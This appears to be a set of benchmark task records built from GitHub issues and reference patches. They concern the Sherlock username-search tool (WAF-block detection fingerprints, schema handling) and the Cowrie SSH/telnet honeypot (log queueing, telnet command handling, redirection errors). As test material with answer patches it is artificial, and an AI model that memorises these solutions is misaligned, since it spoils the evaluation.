diff --git a/sherlock/notify.py b/sherlock/notify.py --- a/sherlock/notify.py +++ b/sherlock/notify.py @@ -238,6 +238,15 @@ def update(self, result): Fore.WHITE + "]" + Fore.GREEN + f" {self.result.site_name}:" + Fore.YELLOW + f" {msg}") + + elif result.status == QueryStatus.WAF: + if self.print_all: + print(Style.BRIGHT + Fore.WHITE + "[" + + Fore.RED + "-" + + Fore.WHITE + "]" + + Fore.GREEN + f" {self.result.site_name}:" + + Fore.RED + " Blocked by bot detection" + + Fore.YELLOW + " (proxy may help)") else: # It should be impossible to ever get here... diff --git a/sherlock/result.py b/sherlock/result.py --- a/sherlock/result.py +++ b/sherlock/result.py @@ -14,6 +14,7 @@ class QueryStatus(Enum): AVAILABLE = "Available" # Username Not Detected UNKNOWN = "Unknown" # Error Occurred While Trying To Detect Username ILLEGAL = "Illegal" # Username Not Allowable For This Site + WAF = "WAF" # Request blocked by WAF (i.e. Cloudflare) def __str__(self): """Convert Object To String. diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -378,9 +378,20 @@ def sherlock( query_status = QueryStatus.UNKNOWN error_context = None + # As WAFs advance and evolve, they will occasionally block Sherlock and lead to false positives + # and negatives. Fingerprints should be added here to filter results that fail to bypass WAFs. + # Fingerprints should be highly targetted. Comment at the end of each fingerprint to indicate target and date. + WAFHitMsgs = [ + '.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,', # 2024-04-08 Cloudflare + '{return l.onPageView}}),Object.defineProperty(r,"perimeterxIdentifiers",{enumerable:' # 2024-04-09 PerimeterX / Human Security + ] + if error_text is not None: error_context = error_text + elif any(hitMsg in r.text for hitMsg in WAFHitMsgs): + query_status = QueryStatus.WAF + elif error_type == "message": # error_flag True denotes no error found in the HTML # error_flag False denotes error found in the HTML
Fiverr false positive <!-- ###################################################################### WARNING! IGNORING THE FOLLOWING TEMPLATE WILL RESULT IN ISSUE CLOSED AS INCOMPLETE ###################################################################### --> ## Checklist <!-- Put x into all boxes (like this [x]) once you have completed what they say. Make sure complete everything in the checklist. --> - [ x] I'm reporting a website that is returning **false positive** results - [ x] I've checked for similar site support requests including closed ones - [ x] I've checked for pull requests attempting to fix this false positive - [ x] I'm only reporting **one** site (create a separate issue for each site) ## Description <!-- Provide the username that is causing Sherlock to return a false positive, along with any other information that might help us fix this false positive. --> https://www.fiverr.com/fincali1979 is not a real fiverr account I checked for closed issues and fiverr is marked as fixed, but it doesn't work now
Hey I want to work on this issue, is it still open?
2024-04-08T21:56:24
sherlock-project/sherlock
2,099
sherlock-project__sherlock-2099
[ "1338" ]
f5796c24b3230a6af559cfb4e11b8df52964d8bb
diff --git a/sherlock/sites.py b/sherlock/sites.py --- a/sherlock/sites.py +++ b/sherlock/sites.py @@ -152,6 +152,11 @@ def __init__(self, data_file_path=None): raise FileNotFoundError(f"Problem while attempting to access " f"data file '{data_file_path}'." ) + + try: + site_data.pop('$schema') + except: + pass self.sites = {} diff --git a/site_list.py b/site_list.py --- a/site_list.py +++ b/site_list.py @@ -5,10 +5,14 @@ # Read the data.json file with open("sherlock/resources/data.json", "r", encoding="utf-8") as data_file: - data = json.load(data_file) + data: dict = json.load(data_file) + +# Removes schema-specific keywords for proper processing +social_networks: dict = dict(data) +social_networks.pop('$schema') # Sort the social networks in alphanumeric order -social_networks = sorted(data.items()) +social_networks: list = sorted(social_networks.items()) # Write the list of supported sites to sites.md with open("sites.md", "w") as site_file:
feat: add json schema validation Adds a JSON Schema that validates `data.json` and `removed_sites.json`. I've already validated the existing data with it and can confirm both files pass. 👍🏾 Prepends the following property to both files: ```json { "$schema": "{path/to/json-schema}" } ``` Removes the `rank` property from `removed_sites.json` and documentation as this is no longer relevant. Removes the "noPeriod" property from Jimdo as this appears to serve on purpose. --- Sorry, also a question. What is the purpose of `responseUrl`? I just realized, this property is not referenced whatsoever in the actual application. 🤔 Can this property be removed in the dataset and schema? Later I do want to make it stricter, i.e. prevent someone from using one `errorType` with the wrong additional field, i.e. ```json { "errorMsg": "Not Found", "errorType": "status_code" } ``` I figured I'd leave it like this for now and find out what `responseUrl` is about. 🤔 ### Related * Closes https://github.com/sherlock-project/sherlock/issues/1336 The goal of this is to improve the experience for developers and leave less room for human-error. It also enforces that we document and provide examples of each field, unlike the current Wiki which tends to get outdated. ![image](https://user-images.githubusercontent.com/22801583/167285185-11711582-a8d1-4157-a5e9-4d590d6e71b6.png) ![image](https://user-images.githubusercontent.com/22801583/167285139-15b5d326-5813-45df-8987-dfd6f7a236ad.png) ![image](https://user-images.githubusercontent.com/22801583/167285147-e759a759-2734-4811-b972-ee75ed7dd530.png)
2024-05-06T01:17:38
sherlock-project/sherlock
2,109
sherlock-project__sherlock-2109
[ "2108" ]
d0c8282e5efc36f61dcbb107edbabb6ff5b28939
diff --git a/sherlock/sites.py b/sherlock/sites.py --- a/sherlock/sites.py +++ b/sherlock/sites.py @@ -177,6 +177,8 @@ def __init__(self, data_file_path=None): raise ValueError( f"Problem parsing json contents at '{data_file_path}': Missing attribute {error}." ) + except TypeError as error: + print(f"Encountered TypeError parsing json contents for target '{site_name}' at {data_file_path}\nSkipping target.\n") return
SHERLOCK// ERROR "string indices must be integers, not 'str' " como puedo solucionar este error que me sale al querer usar sherlock, no se como solucionarlo la verdad
2024-05-08T02:41:37
sherlock-project/sherlock
2,123
sherlock-project__sherlock-2123
[ "2113" ]
f2090bd19806cece29b0acc9fe7801ef6230856e
diff --git a/sherlock/sherlock.py b/sherlock/sherlock.py --- a/sherlock/sherlock.py +++ b/sherlock/sherlock.py @@ -382,11 +382,13 @@ def sherlock( query_status = QueryStatus.UNKNOWN error_context = None - # As WAFs advance and evolve, they will occasionally block Sherlock and lead to false positives - # and negatives. Fingerprints should be added here to filter results that fail to bypass WAFs. - # Fingerprints should be highly targetted. Comment at the end of each fingerprint to indicate target and date. + # As WAFs advance and evolve, they will occasionally block Sherlock and + # lead to false positives and negatives. Fingerprints should be added + # here to filter results that fail to bypass WAFs. Fingerprints should + # be highly targetted. Comment at the end of each fingerprint to + # indicate target and date fingerprinted. WAFHitMsgs = [ - '.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,', # 2024-04-08 Cloudflare + '.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark', # 2024-05-13 Cloudflare '{return l.onPageView}}),Object.defineProperty(r,"perimeterxIdentifiers",{enumerable:' # 2024-04-09 PerimeterX / Human Security ]
False positives (Kick, LibraryThing) Kick and LibraryThing showing F+ for `ehjtohrtjh` _(Issue is only for tracking purposes and so I don't forget -- will pr later)_
I did a false positive on both of those sites when I ran Sherlock inside a Fedora container. But upon running Sherlock on my computer, I only got false positives on LibraryThing. I'm unsure as to why Kick returned a false positive, but it looks like LibraryThing has bot protection
2024-05-14T02:49:45
cowrie/cowrie
283
cowrie__cowrie-283
[ "230" ]
05283b60c37ae70ed4c45c56764ce8685e26fa67
diff --git a/cowrie/output/jsonlog.py b/cowrie/output/jsonlog.py --- a/cowrie/output/jsonlog.py +++ b/cowrie/output/jsonlog.py @@ -32,7 +32,10 @@ import json import os +import Queue +import threading +from twisted.python import log import twisted.python.logfile import cowrie.core.output @@ -47,8 +50,21 @@ def __init__(self, cfg): fn = cfg.get('output_jsonlog', 'logfile') dirs = os.path.dirname(fn) base = os.path.basename(fn) + + # create the log queue with a default buffer size if none is specified in + # the log file. + buffer_size = 10000 + if cfg.has_option('output_jsonlog', 'buffer_size'): + buffer_size = int(cfg.get('output_jsonlog', 'buffer_size')) + self._log_writer_queue = Queue.Queue(maxsize=buffer_size) + + # allocate the output file self.outfile = twisted.python.logfile.DailyLogFile(base, dirs, defaultMode=0o664) + # start the log writer thread + self._log_writer_thread = threading.Thread(target=self._write_log) + self._log_writer_thread.daemon = True + self._log_writer_thread.start() def start(self): """ @@ -59,6 +75,7 @@ def start(self): def stop(self): """ """ + self._log_queue.join() self.outfile.flush() @@ -69,7 +86,26 @@ def write(self, logentry): # Remove twisted 15 legacy keys if i.startswith('log_'): del logentry[i] - json.dump(logentry, self.outfile) - self.outfile.write('\n') - self.outfile.flush() + + # TODO: There's a possibility that the queue is full when we do this put, which means + # we'll lose the log item. We specifically use put_nowait so in that case it doesn't + # block the main writer thread. + try: + self._log_writer_queue.put_nowait(json.dumps(logentry)) + except Queue.Full: + log.err('Could not queue jsonlog item. Consider increasing buffer_size in [output_jsonlog] of your cowrie configuration') + + def _write_log(self): + # there's a probability of hitting IO errors while attempting to write + # for various reasons (for example, the disk is full). So, regardless + # of what happens during the write, we always mark the queue item as done + # so self.stop() can properly join on any remaining items. + while True: + item = self._log_writer_queue.get() + try: + self.outfile.write(item) + self.outfile.write('\n') + self.outfile.flush() + finally: + self._log_writer_queue.task_done()
Overlapping in json logging Hello, Yesterday, I've updated to the newest version of cowrie and found that json logs regulary become invalid because of overlapping messages: {"eventid": "cowrie.direct-tcpip.data", "timestamp": "2016-08-25T19:45:14.966466Z", "sensor": "redacted", "system": "SSHChannel None (13) on SSHService ssh-connection on HoneyPotSSHTransport,65,193.169.53.173", "isError": 0, "src_ip": "redacted", "session": "6649575c", "dst_port": 443, "dst_ip": "redacted", "data": "'\x16\x03\x01\x01x\x01\x00\x01t\x03\x03W\xbfKf\x82v^\x9e\x7f\x15\t\x08+o\x13(9\x05\xcd4\"\xebk}\xcb\xa00|\xce\x9e\x1do\x00\x00\xca\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\xc0\"\xc0!\x00\xa3\x00\x9f\x00k\x00j\x009\x008\x00\x88\x00\x87\xc0\x19\xc0 \x00\xa7\x00m\x00:\x00\x89\xc02\xc0.\xc0_\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x17\xc0\x1a\x00\x1b\xc0\r\xc0\x03\x00\n\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\xc0\x1f\xc0\x1e\x00\xa2\x00\x9e\x00g\x00@\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x18\xc0\x1d\x00\xa6\x00l\x004\x00\x9b\x00F\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x16\x00\x18\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x1a\x00\t\x00\x14\x00\x11\x00\x19\x00\x08\x00\x06\x00\x17\x00\x03\x00\xff\x01\x00\x00\x81\x00\x00\x00\x12\x00\x10\x00\x00\rwww.google.se\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\r\x00\"\x00 \x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x01\x01\x00\x0f\x00\x01\x01'", "message": "direct-tcp forward to 173.194.222.94:443 with data '\x16\x03\x01\x01x\x01\x00\x01t\x03\x03W\xbfKf\x82v^\x9e\x7f\x15\t\x08+o\x13(9\x05\xcd4\"\xebk}\xcb\xa00|\xce\x9e\x1do\x00\x00\xca\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\xc0\"\xc0!\x00\xa3\x00\x9f\x00k\x00j\x009\x008\x00\x88\x00\x87\xc0\x19\xc0 \x00\xa7\x00m\x00:\x00\x89\xc02\xc0.\xc0_\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x17\xc0\x1a\x00\x1b\xc0\r\xc0\x03\x00\n\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\xc0\x1f\xc0\x1e\x00\xa2\x00\x9e\x00g\x00@\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x18\xc0\x1d\x00\xa6\x00l\x004\x00\x9b\x00F\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x16\x00\x18\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x1a\x00\t\x00\x14\x00\x11\x00\x19\x00\x08\x00\x06\x00\x17\x00\x03\x00\xff\x01\x00\x00\x81\x00\x00\x00\x12\x00\x10\x00\x00\rwww.google.se\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\r{"eventid": "cowrie.direct-tcpip.data", "timestamp": "2016-08-25T19:45:14.966466Z", "sensor": "redacted", "system": "SSHChannel None (13) on SSHService ssh-connection on HoneyPotSSHTransport,65,193.169.53.1{"eventid": "cowrie.direct-tcpip.request", "timestamp": "2016-08-25T19:45:24.508664Z", "session": "a0c671d3", "src_port": 5556, "message": "direct-tcp connection request to 98.138.112.32:25 from localhost:5556", "system": "SSHService ssh-connection on HoneyPotSSHTransport,62,193.169.52.222", "isError": 0, "src_ip": "redacted", "dst_port": 25, "dst_ip": "redacted", "sensor": "redacted"} If you look carefully, there is the second log message inserted right into the first ( "\x11\x00\r{"eventid":" ) and the third is inserted into the second one: " 65,193.169.53.1{"eventid": " The only suspicious thing in logs is presence of tracebacks that repeat pretty often: 2016-08-25T22:29:08+0300 [SSHChannel None (2) on SSHService ssh-connection on HoneyPotSSHTransport,65,censored] sending close 2 2016-08-25T22:29:24+0300 [twisted.internet.defer#critical] Unhandled error in Deferred: Traceback (most recent call last): Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly. ... 2016-08-25T22:28:52+0300 [StripCrTelnetTransport,221,censored] Warning: state changed and new state returned 2016-08-25T22:29:01+0300 [twisted.internet.defer#critical] Unhandled error in Deferred: Traceback (most recent call last): Failure: twisted.conch.telnet.OptionRefused: twisted.conch.telnet.OptionRefused:'\x03' Any ideas?
Interesting. Seems at high logging volume it will need some queuing system... On Friday, 26 August 2016, fe7ch [email protected] wrote: > Hello, > > Yesterday, I've updated to the newest version of cowrie and found that > json logs regulary become invalid because of overlapping messages: > > {"eventid": "cowrie.direct-tcpip.data", "timestamp": > "2016-08-25T19:45:14.966466Z", "sensor": "redacted", "system": "SSHChannel > None (13) on SSHService ssh-connection on HoneyPotSSHTransport,65,193.169.53.173", > "isError": 0, "src_ip": "redacted", "session": "6649575c", "dst_port": 443, > "dst_ip": "redacted", "data": "'\x16\x03\x01\x01x\x01\x00\ > x01t\x03\x03W\xbfKf\x82v^\x9e\x7f\x15\t\x08+o\x13(9\x05\ > xcd4\"\xebk}\xcb\xa00|\xce\x9e\x1do\x00\x00\xca\xc00\xc0, > \xc0(\xc0$\xc0\x14\xc0\n\xc0\"\xc0!\x00\xa3\x00\x9f\x00k\ > x00j\x009\x008\x00\x88\x00\x87\xc0\x19\xc0 \x00\xa7\x00m\x00:\x00\x89\ > xc02\xc0.\xc0_\xc0&\xc0\x0f\xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16\x00\x13\xc0\x17\xc0\x1a\x00\x1b\xc0\r\xc0\x03\x00\n\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\xc0\x1f\xc0\x1e\x00\xa2\x00\x9e\x00g\x00@\x003\x002\x00\x9a\x00\x99\x00E\x00D\xc0\x18\xc0\x1d\x00\xa6\x00l\x004\x00\x9b\x00F\xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x16\x00\x18\xc0\x0c\xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x1a\x00\t\x00\x14\x00\x11\x00\x19\x00\x08\x00\x06\x00\x17\x00\x03\x00\xff\x01\x00\x00\x81\x00\x00\x00\x12\x00\x10\x00\x00\rwww.google.se > http://rwww.google.se\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\r\x00\"\x00 > \x06\x01\x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\x01\x01\x00\x0f\x00\x01\x01'", > "message": "direct-tcp forward to 173.194.222.94:443 > http://173.194.222.94:443 with data > '\x16\x03\x01\x01x\x01\x00\x01t\x03\x03W\xbfKf\x82v^\x9e\x7f\x15\t\x08+o\x13(9\x05\xcd4\"\xebk}\xcb\xa00|\xce\x9e\x1do\x00\x00\xca\xc00\xc0,\xc0(\xc0$\xc0\x14\xc0\n\xc0\"\xc0!\x00\xa3\x00\x9f\x00k\x00j\x009\x008\x00\x88\x00\x87\xc0\x19\xc0 > \x00\xa7\x00m\x00:\x00\x89\xc02\xc0.\xc0_\xc0&\xc0\x0f\ > xc0\x05\x00\x9d\x00=\x005\x00\x84\xc0\x12\xc0\x08\xc0\x1c\ > xc0\x1b\x00\x16\x00\x13\xc0\x17\xc0\x1a\x00\x1b\xc0\r\xc0\ > x03\x00\n\xc0/\xc0+\xc0\'\xc0#\xc0\x13\xc0\t\xc0\x1f\xc0\ > x1e\x00\xa2\x00\x9e\x00g\x00@\x003\x002\x00\x9a\x00\x99\ > x00E\x00D\xc0\x18\xc0\x1d\x00\xa6\x00l\x004\x00\x9b\x00F\ > xc01\xc0-\xc0)\xc0%\xc0\x0e\xc0\x04\x00\x9c\x00<\x00/\x00\ > x96\x00A\x00\x07\xc0\x11\xc0\x07\xc0\x16\x00\x18\xc0\x0c\ > xc0\x02\x00\x05\x00\x04\x00\x15\x00\x12\x00\x1a\x00\t\x00\ > x14\x00\x11\x00\x19\x00\x08\x00\x06\x00\x17\x00\x03\x00\ > xff\x01\x00\x00\x81\x00\x00\x00\x12\x00\x10\x00\x00\rwww.google.se > \x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x004\x002\ > x00\x0e\x00\r\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\t\x00\n\ > x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\ > x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\ > x00\x0f\x00\x10\x00\x11\x00\r{"eventid": "cowrie.direct-tcpip.data", > "timestamp": "2016-08-25T19:45:14.966466Z", "sensor": "redacted", "system": > "SSHChannel None (13) on SSHService ssh-connection on > HoneyPotSSHTransport,65,193.169.53.1{"eventid": > "cowrie.direct-tcpip.request", "timestamp": "2016-08-25T19:45:24.508664Z", > "session": "a0c671d3", "src_port": 5556, "message": "direct-tcp connection > request to 98.138.112.32:25 from localhost:5556", "system": "SSHService > ssh-connection on HoneyPotSSHTransport,62,193.169.52.222", "isError": 0, > "src_ip": "redacted", "dst_port": 25, "dst_ip": "redacted", "sensor": > "redacted"} > > If you look carefully, there is the second log message inserted right into > the first ( "\x11\x00\r{"eventid":" ) and the third is inserted into the > second one: " 65,193.169.53.1{"eventid": " > > The only suspicious thing in logs is presence of tracebacks that repeat > pretty often: > > 2016-08-25T22:29:08+0300 [SSHChannel None (2) on SSHService ssh-connection > on HoneyPotSSHTransport,65,censored] sending close 2 > 2016-08-25T22:29:24+0300 [twisted.internet.defer#critical] Unhandled > error in Deferred: > > Traceback (most recent call last): > Failure: twisted.internet.error.ConnectionDone: Connection was closed > cleanly. > ... > > 2016-08-25T22:28:52+0300 [StripCrTelnetTransport,221,censored] Warning: > state changed and new state returned > 2016-08-25T22:29:01+0300 [twisted.internet.defer#critical] Unhandled > error in Deferred: > > Traceback (most recent call last): > Failure: twisted.conch.telnet.OptionRefused: twisted.conch.telnet. > OptionRefused:'\x03' > > Any ideas? > > — > You are receiving this because you are subscribed to this thread. > Reply to this email directly, view it on GitHub > https://github.com/micheloosterhof/cowrie/issues/230, or mute the thread > https://github.com/notifications/unsubscribe-auth/ABA4g8z0PhkgXZTvb_IZQ8RDk5Hbdr6-ks5qjrrdgaJpZM4Jt7oF > . I've run into the same issue. I'm currently testing the queue approach @micheloosterhof mentioned, so PR coming soon.
2016-10-09T22:05:58
cowrie/cowrie
392
cowrie__cowrie-392
[ "385" ]
24c251b405c54911dbb69d8d29d1719cb6cb380d
diff --git a/cowrie/telnet/transport.py b/cowrie/telnet/transport.py --- a/cowrie/telnet/transport.py +++ b/cowrie/telnet/transport.py @@ -138,6 +138,10 @@ def login(ignored): return 'Discard' + def telnet_Command(self, command): + self.transport.protocol.dataReceived(command+'\r') + return "Command" + def _cbLogin(self, ial): """ Fired on a successful login
HoneyPotTelnetAuthProtocol instance has no attribute 'telnet_Command' Environment: Python 2.7.12, twistd 16.0.0 Log: > 2016-12-21 13:30:48-0800 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: xx.xxx.x.xxx:xxxxx (xxx.xx.x.x:2223) [session: TT130] 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] login attempt [/888888] failed 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Warning: state changed and new state returned 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] login attempt [888888/shell] succeeded 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Opening TTY Log: /opt/share/events/tty/20161221-133048-None-130i.log 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Warning: state changed and new state returned 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite why = selectable.doRead() File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead return self._dataReceived(data) File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived rval = self.protocol.dataReceived(data) File "/usr/lib/python2.7/dist-packages/twisted/conch/telnet.py", line 589, in dataReceived self.applicationDataReceived(''.join(appDataBuffer)) File "/usr/lib/python2.7/dist-packages/twisted/conch/telnet.py", line 898, in applicationDataReceived self.protocol.dataReceived(bytes) File "/usr/lib/python2.7/dist-packages/twisted/protocols/basic.py", line 571, in dataReceived why = self.lineReceived(line) File "/usr/lib/python2.7/dist-packages/twisted/conch/telnet.py", line 1000, in lineReceived newState = getattr(self, "telnet_" + oldState)(line) exceptions.AttributeError: HoneyPotTelnetAuthProtocol instance has no attribute 'telnet_Command' 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Closing TTY Log: /opt/share/events/tty/20161221-133048-None-130i.log after 0 seconds 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <type 'excepti ons.AttributeError'>: HoneyPotTelnetAuthProtocol instance has no attribute 'telnet_Command' ] 2016-12-21 13:30:48-0800 [CowrieTelnetTransport,130,xx.xxx.x.xxx] Connection lost after 0 seconds
Can you tell me how to reproduce this? I'm not sure how to reproduce it yet. The above log was copied from a cowrie instance which was exposed to Internet. The instance got over 7k errors in this type during last 10 days. I was able to reproduce this. It appears to be due to having more than just the username and password in the data buffer when authenticating. This can happen if a client tries to send the username, password, and commands all at the same time without waiting for the login to complete. The following command will cause the exception: ```(printf 'root\npass\npwd\n' && cat) | telnet 127.0.0.1 2223``` Changing `self.state = 'Command'` to `self.state = 'Discard'` in `_cbLogin()` will cause the exception to go away, but any commands in the buffer will be lost. This appears to be a long-standing issue in Twisted's AuthenticatingTelnetProtocol. The old, depreciated twisted.protocols.telnet module used telnet_Command for running commands, and the new implementation in twisted.conch still sets self.state to "Command." This appears to have been intended to be used to handle command input, but that is not documented anywhere. To fix this correctly, we would need to implement telnet_Command in HoneyPotTelnetAuthProtocol to forward the input to the user's session. The following function appears to work correctly for me. ``` def telnet_Command(self, command): self.transport.protocol.dataReceived(command+'\r') return "Command" ```
2017-01-04T14:08:50
cowrie/cowrie
397
cowrie__cowrie-397
[ "396" ]
0254a78d53d6c6f8b1539e953e945dc491653597
diff --git a/cowrie/core/honeypot.py b/cowrie/core/honeypot.py --- a/cowrie/core/honeypot.py +++ b/cowrie/core/honeypot.py @@ -45,9 +45,18 @@ def __init__(self, protocol, *args): self.protocol.terminal.transport.session.id, re.sub('[^A-Za-z0-9]', '_', self.outfile)) perm = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH - self.fs.mkfile(self.outfile, 0, 0, 0, stat.S_IFREG | perm) - with open(self.safeoutfile, 'a'): - self.fs.update_realfile(self.fs.getfile(self.outfile), self.safeoutfile) + try: + self.fs.mkfile(self.outfile, 0, 0, 0, stat.S_IFREG | perm) + except fs.FileNotFound: + # The outfile locates at a non-existing directory. + self.protocol.pp.outReceived('-bash: %s: No such file or directory\n' % self.outfile) + self.write = self.write_to_failed + self.outfile = None + self.safeoutfile = None + + else: + with open(self.safeoutfile, 'a'): + self.fs.update_realfile(self.fs.getfile(self.outfile), self.safeoutfile) def check_arguments(self, application, args): @@ -78,10 +87,16 @@ def write_to_file(self, data): self.fs.update_size(self.outfile, self.writtenBytes) + def write_to_failed(self, data): + """ + """ + pass + def start(self): """ """ - self.call() + if self.write != self.write_to_failed: + self.call() self.exit()
Session abort when command was redirected to a file located at a non-exist directory To reproduce the problem, execute this command: `echo "test" > /path/not/exists/file` For a telnet login, the session will abort immediately. For a SSH login, the command execution will hang there. After hitting enter, the CLI resumed. However, an `exit` command will still cause the session termination abnormally. The problem is, in `cowrie/core/protocol.py` line 48, after noticed the command having redirection, cowrie will create the file by `fs.mkfile()`. The `mkfile()` invoked `fs.get_path()`. Since the directory doesn't exist, `get_path` raised `fs.FileNotFound` exception which was not caught properly.
2017-01-05T00:44:10
cowrie/cowrie
415
cowrie__cowrie-415
[ "414" ]
8c3286276aded15d9795f104ea963b9b587421d8
diff --git a/cowrie/telnet/transport.py b/cowrie/telnet/transport.py --- a/cowrie/telnet/transport.py +++ b/cowrie/telnet/transport.py @@ -180,15 +180,17 @@ def enableLocal(self, opt): if opt == ECHO: return True elif opt == SGA: - return True + return False + #return True else: return False def enableRemote(self, opt): if opt == LINEMODE: - self.transport.requestNegotiation(LINEMODE, MODE + chr(TRAPSIG)) - return True + return False + #self.transport.requestNegotiation(LINEMODE, MODE + chr(TRAPSIG)) + #return True elif opt == NAWS: return True elif opt == SGA:
^M for carriage return in telnet Trying to log in via telnet to cowrie results in the following: $telnet xx.yy.zz.aa Trying xx.yy.zz.aa Connected to xx.yy.zz.aa. Escape character is '^]'. login: icantpressenter^M^M^M^M^M^M^M^M^M^M^M^] telnet> q Connection closed. It looks like some kind of control character thing. Telnet on windows "kind of works", and telnet on OS X and Linux (Debian 8.6) produce the above ^M issue. oddly, specifying the destination port in the telnet client (e.g "telnet host 23" ) removes this issue. Probably because control messages aren't sent.
